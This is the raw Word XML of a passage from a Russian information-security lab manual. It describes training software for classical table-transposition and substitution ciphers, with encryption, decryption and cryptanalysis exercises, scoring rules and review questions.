    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>На втором этапе шифрования в правой части центральной панели появляется набор пустых таблиц, количество которых равно количеству таблиц, заполненных на первом этапе. Сами же заполненные исходные таблицы находятся в левой части экрана, все столбцы в них пронумерованы. В нижней панели выводится последовательность цифр – это ключ перестановки, отражающий порядок столбцов в перемешанной таблице. С помощью мыши перетащите столбцы из левой таблицы в правую так, чтобы их порядок в правой таблице соответствовал ключу перестановки. Выполните перестановку столбцов для всех заполненных на первом этапе таблиц, переключая их с помощью кнопок «Следующая» и «Предыдущая». Завершив перестановку (перемешивание) всех столбцов во всех таблицах, нажмите кнопку «Результат». Будет выполнена проверка правильности перемешивания столбцов. При обнаружении ошибок Вам будет выдана таблица, в которой допущена первая из найденных ошибок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>В случае отсутствия ошибок становится возможным выполнение третьего этапа зашифрования – формирование готовой шифрограммы. При переходе к третьему этапу в нижней части экрана появляется трехстрочная таблица, призванная облегчить процесс составления шифрограммы. В каждую ячейку этой таблицы помещается по одному символу, заполненные ячейки имеют белый фон, незаполненные – синий. Использую клавиатуру, можно вводить в эту таблицу текстовую информацию и редактировать ее, используя кнопки «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Backspace</w:t>
      </w:r>
      <w:r>
        <w:t>» или «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Delete</w:t>
      </w:r>
      <w:r>
        <w:t>». Изначально курсор располагается в левой верхней ячейке. Для получения готовой шифрограммы необходимо последовательно по столбцам считать содержимое перемешанных таблиц (находящихся на экране справа) и занести считанные символы в нижнюю таблицу. Когда содержимое всех столбцов из всех перемешанных таблиц будет перенесено в нижнюю таблицу, нажмите кнопку «Результат», после чего будет проведена проверка правильности выполнения последнего этапа зашифрования и выведено соответствующее сообщение. Полученная в итоге строка и есть исходная фраза, зашифрованная методом усложненной перестановки по таблице.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>После успешного выполнения зашифрования информации будет предложено перейти к выполнению обратной операции – расшифрованию. В качестве задания на расшифрование предлагается предварительно зашифрованный текст.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>На первом этапе в верхней части окна выводится шифрограмма, а в центральной части присутствует таблица, столбцы которой уже перемешаны по ключу перестановки. Необходимо заполнить перемешанную таблицу зашифрованным текстом по столбцам. Поскольку столбцы в таблице уже перемешаны, их заполнение производится в нормальном порядке, начиная с крайнего левого. Курсор изначально расположен в первой доступной ячейке и по мере ввода зашифрованного текста в таблицу автоматически переводится на следующие свободные ячейки. В случае если шифрограмма не умещается в одной таблице, автоматически будет создана новая. Просматривать все заполненные таблицы можно с помощью кнопок «Следующая» и «Предыдущая». Замете, что шифрограмма полностью умещается в целое количество таблиц.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Занеся весь зашифрованный текст в таблицы, нажмите кнопку «Результат» на панели управления, чтобы запустить процесс проверки правильности выполнения первого этапа расшифрования. При обнаружении ошибок будет выведено соответствующее сообщение и указано то место в таблицах, где находится первая из допущенных ошибок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="32"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>После корректного заполнения перемешанной таблицы становится доступно выполнение второго этапа расшифрования – восстановление исходного порядка столбцов. Для этой цели в правой части центральной панели располагается набор пустых таблиц, количество которых соответствует количеству таблиц, заполненных на первом этапе. Столбцы же перемешанной таблицы нумеруются, над каждым столбцом записывается его номер в исходной таблице. Обратите внимание, что последовательность индексов над столбцами перемешанной таблицы фактически является ключом перестановки, использованным на этапе зашифрования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>С помощью мыши перетащите все столбцы из левых (перемешанных) таблиц в правые таким образом, чтобы начальный порядок столбцов восстановился (т. е. порядок индексов должен быть таким: 0,1,2,3,4,5). Завершив восстановление порядка столбцов во всех заполненных таблицах, нажмите кнопку «Результат» для проверки правильности выполнения текущего этапа расшифрования и перехода к следующему этапу – получению расшифрованного сообщения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>На третьем этапе расшифрования в нижней части экрана появляется таблица, в которую должен быть осуществлен ввод расшифрованного текста. Как только исходный порядок столбцов восстановлен, становится возможным прочитать некий осмысленный текст в строках правой (восстановленной) таблицы. Считывание расшифрованного сообщения производится последовательно из всех строк всех таблиц, начиная с верхней строки самой первой таблицы. При считывании все закрытые ячейки игнорируются и никак не отображаются в конечном результате. Считанные символы с помощью клавиатуры заносятся в нижнюю таблицу. Как только при считывании Вам встретился признак конца данных (тильда, ~), расшифрование можно считать законченным. При этом в нижней таблице должен прочитываться осмысленный текст. Признак конца данных, а также все символы, считанные после него, игнорируются и не должны быть отражены в расшифрованном сообщении.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Завершив считывание расшифрованной информации, нажмите кнопку «Результат» для проверки правильности выполнения текущего этапа. Если ошибок не обнаружено, выдается сообщение об окончании теста по теме «Шифрование».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>В режиме тестирования без оценки на управляющей панели имеется кнопка «Выполнить», нажатие на которую приводит к автоматическому выполнению текущего этапа и переходу к следующему этапу. Также в процессе зашифрования доступна кнопка «Следующий», позволяющая сразу перейти к тесту на расшифрование. Результаты тренировочного тестирования никак не фиксируются в журнале программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>В режиме с оценкой кнопка «Выполнить» заменяется надписью, отображающей текущую оценку. Начальное значение оценки – 5 баллов. За каждую ошибку, найденную при нажатии на кнопку "Результат", снимается по одному баллу. Кнопка «Следующий» в режиме с оценкой становится доступна только после успешного выполнения этапа зашифрования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>«Дешифрование»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Переход к тестам на дешифрование осуществляется выбором вкладки «Дешифрование». </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Как и на вкладке «Шифрование», тестирование может проводиться в двух режимах: тренировочное тестирование и тестирование с подсчетом оценки. Выбор режима осуществляется установкой или сбросом флажка на панели управления.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Процесс дешифрования заключается в попытке расшифровать зашифрованное сообщение при полностью или частично неизвестных ключах. Напомним, что при шифровании методом усложненной перестановки по таблице, информация защищена тремя ключами: размерностью таблицы, положением в таблице закрытых ячеек и порядком перемешивания столбцов. В данной работе Вам предстоит выполнить дешифрование информации при неизвестном положении четырех запрещенных ячеек и полностью неизвестном ключе перестановки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Перед началом работы в режиме тренировочного тестирования предлагается выбрать один из трех типов теста: подбор местоположения неизвестных запрещенных ячеек, подбор ключа перестановки и полный тест, включающий в себя два предыдущих. Выбрав тип теста, нажмите кнопку «Старт». В результате в окне будет появится набор таблиц и элементов управления, необходимых для выполнения теста.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>В центральной части экрана расположены две таблицы. Левая является перемешанной – в нее шифрограмма заносится по столбцам. В правой столбцы выстраиваются в порядке возрастания индексов – это восстановленная исходная таблица. Из нее информация автоматически считывается по строкам и заносится в однострочную таблицу конечного результата, расположенную в нижней части окна. Для удобства подбора ключей признак конца данных (тильда) и все символы, следующие за ним, не отбрасываются.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Правее двух таблиц шифрования в центральной части находится набор из двух вкладок: «Работа» и «Подсказки».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Вкладка «Работа» содержит две кнопки, включающие режимы поиска закрытых ячеек или перестановки столбцов. В режиме «Поиск ячеек» Вы можете с помощью мыши добавлять в любую </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>из двух таблиц предполагаемые запрещенные ячейки, изображаемые как знак «?» в треугольнике. Повторный щелчок мышью на такой ячейке убирает указанный знак и переводит ячейку в нормальное состояние. Режим «Перестановка столбцов» позволяет Вам с помощью мыши перетаскивать столбцы внутри левой ячейки или из левой в правую. Результатом перетаскивания будет смена индекса перетаскиваемого столбца и, следовательно, изменение предполагаемого ключа перестановки. Обратите внимание, что любое Ваше действие по подбору ключей динамически изменяет содержимое нижней результирующей таблицы. Кнопка «Результат» на протяжении всего тестирования недоступна, тест заканчивается тогда, когда в ходе подбора ключей станет возможным прочитать в нижней таблице осмысленный текст, являющийся искомым расшифрованным сообщением.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Безусловно, прямой подбор даже такой незначительной части ключа, как в данном примере, является трудновыполнимой за приемлемое время задачей. Подсказки можно разделить на два типа: открывающие неизвестную часть ключа и открывающие зашифрованную фразу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>К первому типу относятся подсказки «Закрытая ячейка» и «Положение столбца», которые выявляют положение закрытой ячейки в таблице или положение индекса столбца в ключе перестановки. Столбцы, чей индекс уже известен, помечаются символом «*» и этот индекс уже не может быть присвоен другим столбцам.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Стоимость каждой подсказки указана на кнопке, вызывающей ее. Начальное значение счета составляет 100 очков, текущее его состояние отображается на панели управления программы.</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pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Перечислите пути реализации угроз безопасности АСОИ.</w:t>
      </w:r>
      <w:r w:rsidRPr="005067E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(самостоятельная работа)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Дайте понятие «компьютерного вируса».</w:t>
      </w:r>
      <w:r w:rsidRPr="005067E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(самостоятельная работа)3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Дайте определение, что такое «Троянский конь»?</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pacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Что такое конфиденциальность данных?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:r>
        <w:t>Перечислите два основных класса криптосистем. Что представляет собой каждая криптосистема?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>3.          Опишите принцип шифрования информации методом усложненной перестановки по таблице</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.          Выполните шифрования информации методом усложненной перестановки по таблице со значение счета </w:t>
      </w:r>
      <w:r w:rsidRPr="00502B74">
        <w:t>&gt; 50</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> очков</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.          Выполните шифрования информации методом усложненной перестановки по таблице со значение </w:t>
      </w:r>
      <w:r w:rsidRPr="00502B74">
        <w:t xml:space="preserve">100 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> очков</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Содержание отчета и его форма</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Выполнение задания с оценкой является заключительным действием обучаемого с системой.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">В качестве задания Вам предложена некая шифрограмма, отображающаяся в верхней части центральной панели. Известен формат шифровальной таблицы и расположение в ней некоторых закрытых ячеек. Ключ перестановки неизвестен, но изначально предполагается, что он равен </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>(0,1,2,3,4,5). Известно также, что все сообщение может быть расшифровано с применением лишь одной таблицы шифрования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="111" w:name="l4"/>
      <w:bookmarkEnd w:id="111"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Практическая работа №4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шифрование информации методом сложной подстановки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="af7"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="_Toc3811325"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель работы: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>изучение порядка зашифрования и расшифрования информации методом сложной подстановки, получение навыков дешифрования информации, зашифрованной этим методом.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Теоретическое обоснование</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>В данной лабораторной работе изучается шифрование информации методом сложной подстановки. Данный шифр относится к группе шифров подстановки. Наиболее простым представителем этой группы шифров является метод простой подстановки. Суть этого метода заключается в том, что каждый символ исходного алфавита заменяется одним символом алфавита шифрования. Основным недостатком метода простой подстановки является его относительная нестойкость к дешифрованию, обусловленная тем, что в зашифрованном тексте сохраняется частота появления символов, соответствующая частоте появления символов в исходном тексте. Устранение этого недостатка в методе сложной подстановки достигается заменой каждого символа из исходного алфавита более чем одним символом из алфавита шифрования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C1237">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
